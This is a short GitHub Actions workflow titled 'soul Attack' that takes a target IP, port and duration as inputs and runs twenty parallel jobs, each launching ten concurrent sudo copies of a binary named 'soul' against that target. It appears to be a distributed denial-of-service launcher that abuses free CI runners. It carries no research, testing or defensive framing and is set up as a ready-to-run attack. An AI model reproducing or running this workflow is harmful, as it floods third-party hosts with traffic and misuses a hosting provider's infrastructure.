name: soul Attack
on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
      port:
        description: 'Target Port'
        required: true
      time:
        description: 'Attack Duration'
        required: true

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
    steps:
    - uses: actions/checkout@v3
      with:
        sparse-checkout: |
          soul
        sparse-checkout-cone-mode: false
    - run: chmod +x soul
    - run: for i in {1..10}; do sudo ./soul ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} 999 & done; wait
